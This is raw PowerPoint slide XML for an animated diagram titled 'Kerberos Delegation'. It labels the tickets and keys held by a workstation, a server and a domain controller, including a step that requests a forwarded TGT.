              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                <a:t>)</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
            </a:p>
            <a:p>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="1500"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0"/>
                <a:t>Session Key</a:t>
              </a:r>
              <a:endParaRPr lang="de-DE" sz="1400" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="202" name="Picture 20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86486" y="3840943"/>
              <a:ext cx="362558" cy="362558"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="101" name="Ticket Content"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5971999" y="3787036"/>
            <a:ext cx="2247679" cy="2346131"/>
            <a:chOff x="5223390" y="334075"/>
            <a:chExt cx="2247679" cy="2346131"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="102" name="Group 101"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5223390" y="334075"/>
              <a:ext cx="2247679" cy="2346131"/>
              <a:chOff x="3657899" y="705967"/>
              <a:chExt cx="2247679" cy="2346131"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="107" name="Picture 10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657899" y="705967"/>
                <a:ext cx="2247679" cy="2346131"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:effectLst>
                <a:glow rad="508000">
                  <a:schemeClr val="bg1"/>
                </a:glow>
              </a:effectLst>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="108" name="Picture 10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13100" y="1017929"/>
                <a:ext cx="190699" cy="377609"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="109" name="TextBox 108"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4255264" y="1075490"/>
                <a:ext cx="1468864" cy="625812"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr>
                  <a:spcAft>
                    <a:spcPts val="2000"/>
                  </a:spcAft>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="1200" dirty="0"/>
                  <a:t>Ticket Information</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr>
                  <a:spcAft>
                    <a:spcPts val="2000"/>
                  </a:spcAft>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="1200" dirty="0"/>
                  <a:t>Session Key</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="110" name="TextBox 109"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4247543" y="2176840"/>
                <a:ext cx="1468864" cy="625812"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr>
                  <a:spcAft>
                    <a:spcPts val="2000"/>
                  </a:spcAft>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="1200" dirty="0"/>
                  <a:t>Session Key</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr>
                  <a:spcAft>
                    <a:spcPts val="2000"/>
                  </a:spcAft>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="1200" dirty="0"/>
                  <a:t>User Credentials</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="111" name="Picture 11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flipH="1">
                <a:off x="3945805" y="2560430"/>
                <a:ext cx="225134" cy="308918"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="103" name="Picture 10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492989" y="1073076"/>
              <a:ext cx="311866" cy="311866"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="104" name="Picture 10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480530" y="1762155"/>
              <a:ext cx="311866" cy="311866"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="105" name="Picture 104"/>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347672" y="1570076"/>
              <a:ext cx="189855" cy="278994"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="106" name="Picture 105"/>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333219" y="498781"/>
              <a:ext cx="190335" cy="279699"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="352517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wipe(right)">
                                      <p:cBhvr>
                                        <p:cTn id="11" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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1"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="101"/>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1.94444E-6 -7.40741E-7 L -0.29879 0.00463 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="129"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="-14948" y="231"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="25" presetID="10" presetClass="exit" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="26" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="44"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="44"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="28" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="29" presetID="10" presetClass="exit" presetSubtype="0" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="30" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="139"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="31" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="139"/>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5. TGS Request to obtain forwarded TGT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Kerberos Delegation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="92" name="Group 91"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="152030" y="4844491"/>
            <a:ext cx="2795151" cy="1441365"/>
            <a:chOff x="3025668" y="3771580"/>
            <a:chExt cx="2795151" cy="1441365"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="93" name="Picture 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9693" y="3953993"/>
              <a:ext cx="2651126" cy="1258952"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>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5668" y="3771580"/>
              <a:ext cx="499308" cy="685686"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="95" name="TextBox 94"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3208778" y="4022720"/>
              <a:ext cx="2562935" cy="215444"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                <a:t>Server</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="96" name="TextBox 95"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3208778" y="4254546"/>
              <a:ext cx="2562935" cy="184666"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1200" dirty="0"/>
                <a:t>Service Credentials Cache</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="97" name="Picture 9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2319" y="4593843"/>
              <a:ext cx="379222" cy="379222"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="98" name="TextBox 97"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3932492" y="4653136"/>
              <a:ext cx="1575612" cy="215444"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="1500"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                <a:t>Service Key</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="138" name="Workstation Big"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="203769" y="1124744"/>
            <a:ext cx="2745305" cy="3312979"/>
            <a:chOff x="203769" y="1436964"/>
            <a:chExt cx="2745305" cy="3312979"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="139" name="Workstation Small"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="203769" y="1439349"/>
              <a:ext cx="2745305" cy="2451771"/>
              <a:chOff x="195776" y="2708920"/>
              <a:chExt cx="2745305" cy="2451771"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="152" name="Picture 1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5155" y="2855866"/>
                <a:ext cx="2695926" cy="2304825"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="153" name="TextBox 152"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="312812" y="2939970"/>
                <a:ext cx="2567940" cy="215444"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                  <a:t>Workstation</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="160" name="TextBox 159"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="312813" y="3183336"/>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161" name="Picture 1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866" y="3457211"/>
                <a:ext cx="327713" cy="327713"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="162" name="TextBox 161"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="909969" y="3482148"/>
                <a:ext cx="1789823"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Ticket</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr>
                  <a:spcAft>
                    <a:spcPts val="1500"/>
                  </a:spcAft>
                </a:pPr>
                <a:r>
                  <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                  <a:t>Ticket-</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="de-DE" sz="1400" dirty="0" err="1"/>
                  <a:t>Granting</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                  <a:t> Service Session Key</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="163" name="Picture 1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5776" y="2708920"/>
                <a:ext cx="566691" cy="526075"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="164" name="Picture 1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6939" y="3898005"/>
                <a:ext cx="472016" cy="312696"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="165" name="Picture 16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8493" y="4323782"/>
                <a:ext cx="348452" cy="348452"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="140" name="Workstation Large"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="203769" y="1436964"/>
              <a:ext cx="2745305" cy="3312979"/>
              <a:chOff x="5269256" y="151840"/>
              <a:chExt cx="2745305" cy="3312979"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="147" name="Picture 14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13877" y="302498"/>
                <a:ext cx="2700684" cy="3162321"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="148" name="Group 147"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="5269256" y="151840"/>
                <a:ext cx="2685437" cy="665914"/>
                <a:chOff x="2925296" y="1597991"/>
                <a:chExt cx="2685437" cy="665914"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="149" name="TextBox 148"/>
                <p:cNvSpPr txBox="1"/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3042792" y="1832275"/>
                  <a:ext cx="2567940" cy="215444"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                  <a:spAutoFit/>
                </a:bodyPr>
                <a:lstStyle/>
                <a:p>
                  <a:pPr algn="ctr"/>
                  <a:r>
                    <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                    <a:t>Workstation</a:t>
                  </a:r>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="150" name="TextBox 149"/>
                <p:cNvSpPr txBox="1"/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3042793" y="2079239"/>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151" name="Picture 1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25296" y="1597991"/>
                  <a:ext cx="566691" cy="526075"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
          </p:grpSp>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="141" name="Picture 1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6928" y="2188136"/>
              <a:ext cx="327713" cy="327713"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="142" name="TextBox 141"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="918031" y="2213073"/>
              <a:ext cx="1789823" cy="2062103"/>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Ticket</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="1500"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                <a:t>Ticket-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0" err="1"/>
                <a:t>Granting</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                <a:t> Service Session Key</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="1500"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0"/>
                <a:t>Service Ticket</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="1500"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0"/>
                <a:t>Session Key</a:t>
              </a:r>
              <a:endParaRPr lang="de-DE" sz="1400" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="143" name="Picture 1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5001" y="2628930"/>
              <a:ext cx="472016" cy="312696"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="144" name="Picture 14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6555" y="3054707"/>
              <a:ext cx="348452" cy="348452"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="145" name="Picture 14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0449" y="3965437"/>
              <a:ext cx="380199" cy="375562"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="146" name="Picture 14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7684" y="3577162"/>
              <a:ext cx="475522" cy="315018"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="180" name="Group 179"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5762801" y="1116830"/>
            <a:ext cx="3209859" cy="2797046"/>
            <a:chOff x="5771714" y="1415706"/>
            <a:chExt cx="3209859" cy="2797046"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="181" name="Picture 1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05578" y="1597989"/>
              <a:ext cx="2973722" cy="2593105"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="182" name="TextBox 181"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6671087" y="1698030"/>
              <a:ext cx="1442703" cy="215444"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                <a:t>Domain Controller</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="183" name="TextBox 182"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6589790" y="1957026"/>
              <a:ext cx="1612173" cy="184666"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="de-DE" sz="1200" dirty="0"/>
                <a:t>KDC Account Database</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="184" name="Picture 1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83374" y="2303223"/>
              <a:ext cx="327713" cy="327713"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="185" name="TextBox 184"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6763295" y="2363506"/>
              <a:ext cx="1806580" cy="1246495"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="1500"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="de-DE" sz="1400"/>
                <a:t>User Key</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="1500"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="de-DE" sz="1400"/>
                <a:t>Ticket-Granting Service Key</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="1500"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="de-DE" sz="1400"/>
                <a:t>System Key</a:t>
              </a:r>
              <a:endParaRPr lang="de-DE" sz="1400" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="186" name="Picture 18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71714" y="1415706"/>
              <a:ext cx="628030" cy="741586"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="187" name="Picture 18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19698" y="3450877"/>
              <a:ext cx="761875" cy="761875"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="188" name="Picture 18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178170" y="2812347"/>
              <a:ext cx="351842" cy="351842"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="189" name="Picture 1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6185" y="3298419"/>
              <a:ext cx="379222" cy="379222"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="99" name="Group 98"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3111530" y="2060560"/>
            <a:ext cx="2500581" cy="1390318"/>
            <a:chOff x="3111530" y="3857261"/>
            <a:chExt cx="2500581" cy="1390318"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="100" name="Group 99"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="3111530" y="3857261"/>
              <a:ext cx="2500581" cy="1390318"/>
              <a:chOff x="3111530" y="3857261"/>
              <a:chExt cx="2500581" cy="1390318"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="102" name="Rectangle 101"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
